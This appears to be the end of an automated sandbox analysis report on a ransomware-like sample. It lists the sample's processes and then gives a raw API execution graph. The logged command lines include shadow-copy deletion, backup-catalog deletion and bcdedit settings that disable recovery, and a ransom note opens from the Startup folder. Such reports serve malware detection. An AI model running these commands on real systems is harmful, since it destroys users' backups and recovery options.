                                                          Wow64 process (32bit):false
                                                          Commandline:wmic shadowcopy delete
                                                          Imagebase:0x7ff7678a0000
                                                          File size:576'000 bytes
                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:15
                                                          Start time:08:26:40
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                                                          Imagebase:0x7ff73d1d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:16
                                                          Start time:08:26:40
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:17
                                                          Start time:08:26:41
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\bcdedit.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                          Imagebase:0x7ff6e7bd0000
                                                          File size:491'864 bytes
                                                          MD5 hash:74F7B84B0A547592CA63A00A8C4AD583
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:18
                                                          Start time:08:26:41
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\bcdedit.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:bcdedit /set {default} recoveryenabled no
                                                          Imagebase:0x7ff6e7bd0000
                                                          File size:491'864 bytes
                                                          MD5 hash:74F7B84B0A547592CA63A00A8C4AD583
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:19
                                                          Start time:08:26:41
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                                                          Imagebase:0x7ff73d1d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:20
                                                          Start time:08:26:41
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:21
                                                          Start time:08:26:41
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\wbadmin.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:wbadmin delete catalog -quiet
                                                          Imagebase:0x7ff779420000
                                                          File size:329'728 bytes
                                                          MD5 hash:F2AA55885A2C014DA99F1355F3F71E4A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:22
                                                          Start time:08:26:41
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\wbengine.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\system32\wbengine.exe"
                                                          Imagebase:0x7ff7a93c0000
                                                          File size:1'585'152 bytes
                                                          MD5 hash:17270A354A66590953C4AAC1CF54E507
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:23
                                                          Start time:08:26:41
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\vdsldr.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\vdsldr.exe -Embedding
                                                          Imagebase:0x7ff683dc0000
                                                          File size:27'136 bytes
                                                          MD5 hash:472A05A6ADC167E9E5D2328AD98E3067
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:24
                                                          Start time:08:26:41
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\vds.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\vds.exe
                                                          Imagebase:0x7ff7a6780000
                                                          File size:723'968 bytes
                                                          MD5 hash:0781CE7ECCD9F6318BA72CD96B5B8992
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:26
                                                          Start time:08:26:49
                                                          Start date:04/09/2024
                                                          Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                          Imagebase:0x8e0000
                                                          File size:1'357'824 bytes
                                                          MD5 hash:840EB9E50C131322605C5EA90AE1312F
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:28
                                                          Start time:08:26:52
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                                                          Imagebase:0x7ff73d1d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:29
                                                          Start time:08:26:53
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:30
                                                          Start time:08:26:53
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                          Imagebase:0x7ff67e6d0000
                                                          File size:55'320 bytes
                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:33
                                                          Start time:08:26:57
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\vssadmin.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:vssadmin delete shadows /all /quiet
                                                          Imagebase:0x7ff729250000
                                                          File size:145'920 bytes
                                                          MD5 hash:B58073DB8892B67A672906C9358020EC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:34
                                                          Start time:08:26:59
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:wmic shadowcopy delete
                                                          Imagebase:0x7ff7678a0000
                                                          File size:576'000 bytes
                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:37
                                                          Start time:08:27:03
                                                          Start date:04/09/2024
                                                          Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                          Imagebase:0x6b0000
                                                          File size:1'357'824 bytes
                                                          MD5 hash:840EB9E50C131322605C5EA90AE1312F
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:38
                                                          Start time:08:27:09
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                                                          Imagebase:0x7ff73d1d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:39
                                                          Start time:08:27:09
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:40
                                                          Start time:08:27:10
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\bcdedit.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                          Imagebase:0x7ff6e7bd0000
                                                          File size:491'864 bytes
                                                          MD5 hash:74F7B84B0A547592CA63A00A8C4AD583
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:43
                                                          Start time:08:27:12
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\bcdedit.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:bcdedit /set {default} recoveryenabled no
                                                          Imagebase:0x7ff6e7bd0000
                                                          File size:491'864 bytes
                                                          MD5 hash:74F7B84B0A547592CA63A00A8C4AD583
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:44
                                                          Start time:08:27:13
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                                                          Imagebase:0x7ff73d1d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:45
                                                          Start time:08:27:13
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:46
                                                          Start time:08:27:15
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\wbadmin.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:wbadmin delete catalog -quiet
                                                          Imagebase:0x7ff779420000
                                                          File size:329'728 bytes
                                                          MD5 hash:F2AA55885A2C014DA99F1355F3F71E4A
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:47
                                                          Start time:08:27:18
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\notepad.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\read_it.txt
                                                          Imagebase:0x7ff702c00000
                                                          File size:201'216 bytes
                                                          MD5 hash:27F71B12CB585541885A31BE22F61C83
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:49
                                                          Start time:08:27:26
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\notepad.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\read_it.txt
                                                          Imagebase:0x7ff702c00000
                                                          File size:201'216 bytes
                                                          MD5 hash:27F71B12CB585541885A31BE22F61C83
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:51
                                                          Start time:08:28:32
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\notepad.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\read_it.txt
                                                          Imagebase:0x7ff702c00000
                                                          File size:201'216 bytes
                                                          MD5 hash:27F71B12CB585541885A31BE22F61C83
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false


                                                            Execution Graph

                                                            Execution Coverage:9.1%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:10%
                                                            Total number of Nodes:1554
                                                            Total number of Limit Nodes:53
24335->24337 24335->24339 24336 6a522 24370 6a63b 20 API calls _abort 24336->24370 24337->24288 24339->24335 24339->24336 24371 68cac 7 API calls 2 library calls 24339->24371 24341->24288 24349 4b4b3 24342->24349 24345->24302 24346 4cab4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24346->24309 24347->24318 24348->24313 24357 5fe20 24349->24357 24352 4b4d1 24359 4cf12 24352->24359 24353 4b4aa 24353->24307 24353->24346 24355 4b4e5 24355->24353 24356 4b4e9 GetFileAttributesW 24355->24356 24356->24353 24358 4b4c0 GetFileAttributesW 24357->24358 24358->24352 24358->24353 24360 4cf1f _wcslen 24359->24360 24361 4cfc7 GetCurrentDirectoryW 24360->24361 24362 4cf48 _wcslen 24360->24362 24361->24362 24362->24355 24364 6a68c 24363->24364 24369 6a65c _abort 24363->24369 24373 6a63b 20 API calls _abort 24364->24373 24366 6a677 RtlAllocateHeap 24367 6a68a 24366->24367 24366->24369 24367->24337 24369->24364 24369->24366 24372 68cac 7 API calls 2 library calls 24369->24372 24370->24337 24371->24339 24372->24369 24373->24367 26038 41025 29 API calls 26039 72025 21 API calls 2 library calls 26040 5b420 GdipCloneImage GdipAlloc 26097 64a20 5 API calls _ValidateLocalCookies 26041 5d755 107 API calls 4 library calls 26042 5f42f 14 API calls ___delayLoadHelper2@8 26043 42037 142 API calls __EH_prolog 26044 42430 26 API calls std::bad_exception::bad_exception 26045 4a830 80 API calls Concurrency::cancel_current_task 26098 67230 QueryPerformanceFrequency QueryPerformanceCounter 26099 5c232 GetDlgItem EnableWindow ShowWindow SendMessageW 24434 4213d 24435 42150 24434->24435 24436 42148 24434->24436 24438 4214e 24435->24438 24440 5fd0e 24435->24440 24453 42162 27 API calls Concurrency::cancel_current_task 24436->24453 24441 5fd13 ___std_exception_copy 24440->24441 24442 5fd2d 24441->24442 24444 5fd2f 24441->24444 24456 68cac 7 API calls 2 library calls 24441->24456 24442->24438 24445 448de Concurrency::cancel_current_task 24444->24445 24447 5fd39 24444->24447 24454 63190 
RaiseException 24445->24454 24457 63190 RaiseException 24447->24457 24448 448fa 24450 44910 24448->24450 24455 4136b 26 API calls Concurrency::cancel_current_task 24448->24455 24450->24438 24451 60670 24453->24438 24454->24448 24455->24450 24456->24441 24457->24451 24465 6cb40 24466 6cb52 24465->24466 24467 6cb49 24465->24467 24469 6ca37 24467->24469 24470 6a365 _abort 38 API calls 24469->24470 24471 6ca44 24470->24471 24489 6cb5e 24471->24489 24473 6ca4c 24498 6c7cb 24473->24498 24476 6a64e __vsnwprintf_l 21 API calls 24477 6ca74 24476->24477 24488 6caa6 24477->24488 24505 6cc00 24477->24505 24480 6a4ba _free 20 API calls 24482 6ca63 24480->24482 24481 6caa1 24515 6a63b 20 API calls _abort 24481->24515 24482->24466 24484 6caea 24484->24488 24516 6c6a1 26 API calls 24484->24516 24485 6cabe 24485->24484 24486 6a4ba _free 20 API calls 24485->24486 24486->24484 24488->24480 24490 6cb6a ___scrt_is_nonwritable_in_current_image 24489->24490 24491 6a365 _abort 38 API calls 24490->24491 24492 6cb74 24491->24492 24496 6cbf8 _abort 24492->24496 24497 6a4ba _free 20 API calls 24492->24497 24517 69f44 38 API calls _abort 24492->24517 24518 6bc41 EnterCriticalSection 24492->24518 24519 6cbef LeaveCriticalSection _abort 24492->24519 24496->24473 24497->24492 24499 65794 __cftof 38 API calls 24498->24499 24500 6c7dd 24499->24500 24501 6c7fe 24500->24501 24502 6c7ec GetOEMCP 24500->24502 24503 6c815 24501->24503 24504 6c803 GetACP 24501->24504 24502->24503 24503->24476 24503->24482 24504->24503 24506 6c7cb 40 API calls 24505->24506 24507 6cc1f 24506->24507 24508 6cc26 24507->24508 24510 6cc70 IsValidCodePage 24507->24510 24514 6cc95 _abort 24507->24514 24509 60bcc _ValidateLocalCookies 5 API calls 24508->24509 24511 6ca99 24509->24511 24510->24508 24512 6cc82 GetCPInfo 24510->24512 24511->24481 24511->24485 24512->24508 24512->24514 24520 6c8a3 GetCPInfo 24514->24520 24515->24488 24516->24488 24518->24492 24519->24492 24521 6c8dd 24520->24521 24529 6c987 24520->24529 24530 6d998 
24521->24530 24524 60bcc _ValidateLocalCookies 5 API calls 24526 6ca33 24524->24526 24526->24508 24528 6bb88 __vsnwprintf_l 43 API calls 24528->24529 24529->24524 24531 65794 __cftof 38 API calls 24530->24531 24532 6d9b8 MultiByteToWideChar 24531->24532 24534 6d9f6 24532->24534 24542 6da8e 24532->24542 24536 6a64e __vsnwprintf_l 21 API calls 24534->24536 24539 6da17 _abort __vsnwprintf_l 24534->24539 24535 60bcc _ValidateLocalCookies 5 API calls 24537 6c93e 24535->24537 24536->24539 24544 6bb88 24537->24544 24538 6da88 24549 6bbd3 20 API calls _free 24538->24549 24539->24538 24541 6da5c MultiByteToWideChar 24539->24541 24541->24538 24543 6da78 GetStringTypeW 24541->24543 24542->24535 24543->24538 24545 65794 __cftof 38 API calls 24544->24545 24546 6bb9b 24545->24546 24550 6b96b 24546->24550 24549->24542 24551 6b986 __vsnwprintf_l 24550->24551 24552 6b9ac MultiByteToWideChar 24551->24552 24553 6b9d6 24552->24553 24554 6bb60 24552->24554 24559 6a64e __vsnwprintf_l 21 API calls 24553->24559 24561 6b9f7 __vsnwprintf_l 24553->24561 24555 60bcc _ValidateLocalCookies 5 API calls 24554->24555 24556 6bb73 24555->24556 24556->24528 24557 6ba40 MultiByteToWideChar 24558 6baac 24557->24558 24560 6ba59 24557->24560 24586 6bbd3 20 API calls _free 24558->24586 24559->24561 24577 6bf7c 24560->24577 24561->24557 24561->24558 24565 6ba83 24565->24558 24568 6bf7c __vsnwprintf_l 11 API calls 24565->24568 24566 6babb 24567 6a64e __vsnwprintf_l 21 API calls 24566->24567 24571 6badc __vsnwprintf_l 24566->24571 24567->24571 24568->24558 24569 6bb51 24585 6bbd3 20 API calls _free 24569->24585 24571->24569 24572 6bf7c __vsnwprintf_l 11 API calls 24571->24572 24573 6bb30 24572->24573 24573->24569 24574 6bb3f WideCharToMultiByte 24573->24574 24574->24569 24575 6bb7f 24574->24575 24587 6bbd3 20 API calls _free 24575->24587 24578 6bca8 _abort 5 API calls 24577->24578 24579 6bfa3 24578->24579 24582 6bfac 24579->24582 24588 6c004 10 API calls 3 library calls 24579->24588 24581 6bfec LCMapStringW 
24581->24582 24583 60bcc _ValidateLocalCookies 5 API calls 24582->24583 24584 6ba70 24583->24584 24584->24558 24584->24565 24584->24566 24585->24558 24586->24554 24587->24558 24588->24581 26047 6d040 GetProcessHeap 26117 60f40 LocalFree 26048 5d755 97 API calls 4 library calls 26101 5d755 102 API calls 4 library calls 26052 58850 132 API calls 26102 5c650 100 API calls 26053 60450 27 API calls 26118 72f50 CloseHandle 24599 60462 24600 6046e ___scrt_is_nonwritable_in_current_image 24599->24600 24631 5fffc 24600->24631 24602 60475 24603 605c8 24602->24603 24606 6049f 24602->24606 24708 6085a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 24603->24708 24605 605cf 24701 6916a 24605->24701 24615 604de ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24606->24615 24642 69d0d 24606->24642 24613 604be 24622 6053f 24615->24622 24704 68c5c 38 API calls _abort 24615->24704 24617 60545 24651 69c5e 51 API calls 24617->24651 24620 6054d 24652 5eedc 24620->24652 24650 60975 GetStartupInfoW _abort 24622->24650 24625 60561 24625->24605 24626 60565 24625->24626 24627 6056e 24626->24627 24706 6910d 28 API calls _abort 24626->24706 24707 6016d 12 API calls ___scrt_uninitialize_crt 24627->24707 24630 60576 24630->24613 24632 60005 24631->24632 24710 60676 IsProcessorFeaturePresent 24632->24710 24634 60011 24711 63a3e 24634->24711 24636 60016 24637 6001a 24636->24637 24719 69b97 24636->24719 24637->24602 24640 60031 24640->24602 24643 69d24 24642->24643 24644 60bcc _ValidateLocalCookies 5 API calls 24643->24644 24645 604b8 24644->24645 24645->24613 24646 69cb1 24645->24646 24649 69ce0 24646->24649 24647 60bcc _ValidateLocalCookies 5 API calls 24648 69d09 24647->24648 24648->24615 24649->24647 24650->24617 24651->24620 24810 51b5c 24652->24810 24656 5eefc 24859 5bceb 24656->24859 24658 5ef05 _abort 24659 5ef18 GetCommandLineW 24658->24659 24660 5efbc GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 
24659->24660 24661 5ef2b 24659->24661 24663 44a00 _swprintf 51 API calls 24660->24663 24893 5d588 83 API calls 24661->24893 24665 5f023 SetEnvironmentVariableW GetModuleHandleW LoadIconW 24663->24665 24664 5ef31 24666 5efb6 24664->24666 24667 5ef39 OpenFileMappingW 24664->24667 24863 5c76d LoadBitmapW 24665->24863 24897 5ebae SetEnvironmentVariableW SetEnvironmentVariableW 24666->24897 24670 5ef51 MapViewOfFile 24667->24670 24671 5efad CloseHandle 24667->24671 24674 5efa6 UnmapViewOfFile 24670->24674 24675 5ef62 __InternalCxxFrameHandler 24670->24675 24671->24660 24674->24671 24894 5ebae SetEnvironmentVariableW SetEnvironmentVariableW 24675->24894 24680 5ef7e 24895 50675 82 API calls 24680->24895 24681 5a0a7 27 API calls 24683 5f083 DialogBoxParamW 24681->24683 24685 5f0bd 24683->24685 24684 5ef92 24896 5072b 82 API calls _wcslen 24684->24896 24688 5f0d6 24685->24688 24689 5f0cf Sleep 24685->24689 24687 5ef9d 24687->24674 24691 5f0e4 24688->24691 24898 5becf CompareStringW SetCurrentDirectoryW _abort _wcslen 24688->24898 24689->24688 24692 5f103 DeleteObject 24691->24692 24693 5f11f 24692->24693 24694 5f118 DeleteObject 24692->24694 24695 5f150 24693->24695 24696 5f162 24693->24696 24694->24693 24899 5ec0b 6 API calls 24695->24899 24890 5bd51 24696->24890 24699 5f156 CloseHandle 24699->24696 24700 5f19c 24705 609ab GetModuleHandleW 24700->24705 25062 68ee7 24701->25062 24704->24622 24705->24625 24706->24627 24707->24630 24708->24605 24710->24634 24723 64ae7 24711->24723 24715 63a4f 24716 63a5a 24715->24716 24737 64b23 DeleteCriticalSection 24715->24737 24716->24636 24718 63a47 24718->24636 24764 6d06a 24719->24764 24722 63a5d 7 API calls 2 library calls 24722->24637 24724 64af0 24723->24724 24726 64b19 24724->24726 24727 63a43 24724->24727 24738 64d2c 24724->24738 24743 64b23 DeleteCriticalSection 24726->24743 24727->24718 24729 63b6c 24727->24729 24757 64c3d 24729->24757 24732 63b81 24732->24715 24734 63b8f 24735 63b9c 24734->24735 24763 63b9f 6 API calls 
___vcrt_FlsFree 24734->24763 24735->24715 24737->24718 24744 64b52 24738->24744 24741 64d64 InitializeCriticalSectionAndSpinCount 24742 64d4f 24741->24742 24742->24724 24743->24727 24745 64b73 24744->24745 24746 64b6f 24744->24746 24745->24746 24747 64bdb GetProcAddress 24745->24747 24750 64bcc 24745->24750 24752 64bf2 LoadLibraryExW 24745->24752 24746->24741 24746->24742 24747->24746 24749 64be9 24747->24749 24749->24746 24750->24747 24751 64bd4 FreeLibrary 24750->24751 24751->24747 24753 64c39 24752->24753 24754 64c09 GetLastError 24752->24754 24753->24745 24754->24753 24755 64c14 ___vcrt_FlsSetValue 24754->24755 24755->24753 24756 64c2a LoadLibraryExW 24755->24756 24756->24745 24758 64b52 ___vcrt_FlsSetValue 5 API calls 24757->24758 24759 64c57 24758->24759 24760 64c70 TlsAlloc 24759->24760 24761 63b76 24759->24761 24761->24732 24762 64cee 6 API calls ___vcrt_FlsSetValue 24761->24762 24762->24734 24763->24732 24767 6d087 24764->24767 24768 6d083 24764->24768 24765 60bcc _ValidateLocalCookies 5 API calls 24766 60023 24765->24766 24766->24640 24766->24722 24767->24768 24770 6b6b0 24767->24770 24768->24765 24771 6b6bc ___scrt_is_nonwritable_in_current_image 24770->24771 24782 6bc41 EnterCriticalSection 24771->24782 24773 6b6c3 24783 6d538 24773->24783 24775 6b6d2 24781 6b6e1 24775->24781 24796 6b539 29 API calls 24775->24796 24778 6b6dc 24797 6b5ef GetStdHandle GetFileType 24778->24797 24780 6b6f2 _abort 24780->24767 24798 6b6fd LeaveCriticalSection _abort 24781->24798 24782->24773 24784 6d544 ___scrt_is_nonwritable_in_current_image 24783->24784 24785 6d551 24784->24785 24786 6d568 24784->24786 24807 6a63b 20 API calls _abort 24785->24807 24799 6bc41 EnterCriticalSection 24786->24799 24789 6d556 24808 65009 26 API calls _abort 24789->24808 24791 6d560 _abort 24791->24775 24792 6d5a0 24809 6d5c7 LeaveCriticalSection _abort 24792->24809 24793 6d574 24793->24792 24800 6d489 24793->24800 24796->24778 24797->24781 24798->24780 24799->24793 24801 6c146 _abort 20 API 
calls 24800->24801 24802 6d49b 24801->24802 24804 6bf1a 11 API calls 24802->24804 24806 6d4a8 24802->24806 24803 6a4ba _free 20 API calls 24805 6d4fa 24803->24805 24804->24802 24805->24793 24806->24803 24807->24789 24808->24791 24809->24791 24811 5fe20 24810->24811 24812 51b66 GetModuleHandleW 24811->24812 24813 51b81 GetProcAddress 24812->24813 24814 51be0 24812->24814 24816 51bb2 GetProcAddress 24813->24816 24817 51b9a 24813->24817 24815 51f0d GetModuleFileNameW 24814->24815 24909 6883e 42 API calls __vsnwprintf_l 24814->24909 24826 51f2b 24815->24826 24819 51bc4 24816->24819 24817->24816 24819->24814 24820 51e4d 24820->24815 24821 51e58 GetModuleFileNameW CreateFileW 24820->24821 24822 51f01 CloseHandle 24821->24822 24823 51e88 SetFilePointer 24821->24823 24822->24815 24823->24822 24824 51e96 ReadFile 24823->24824 24824->24822 24827 51eb4 24824->24827 24829 51f8d GetFileAttributesW 24826->24829 24830 51fa5 24826->24830 24832 51f56 CompareStringW 24826->24832 24900 4c5f9 24826->24900 24903 51b14 24826->24903 24827->24822 24831 51b14 2 API calls 24827->24831 24829->24826 24829->24830 24833 51fb0 24830->24833 24836 51fe5 24830->24836 24831->24827 24832->24826 24835 51fc9 GetFileAttributesW 24833->24835 24838 51fe1 24833->24838 24834 520f4 24858 5b62d GetCurrentDirectoryW 24834->24858 24835->24833 24835->24838 24836->24834 24837 4c5f9 GetVersionExW 24836->24837 24839 51fff 24837->24839 24838->24836 24840 52006 24839->24840 24841 5206c 24839->24841 24843 51b14 2 API calls 24840->24843 24842 44a00 _swprintf 51 API calls 24841->24842 24844 52094 AllocConsole 24842->24844 24845 52010 24843->24845 24846 520a1 GetCurrentProcessId AttachConsole 24844->24846 24847 520ec ExitProcess 24844->24847 24848 51b14 2 API calls 24845->24848 24910 64df3 24846->24910 24850 5201a 24848->24850 24852 4f917 53 API calls 24850->24852 24851 520c2 GetStdHandle WriteConsoleW Sleep FreeConsole 24851->24847 24853 52035 24852->24853 24854 44a00 _swprintf 51 API calls 24853->24854 24855 52048 
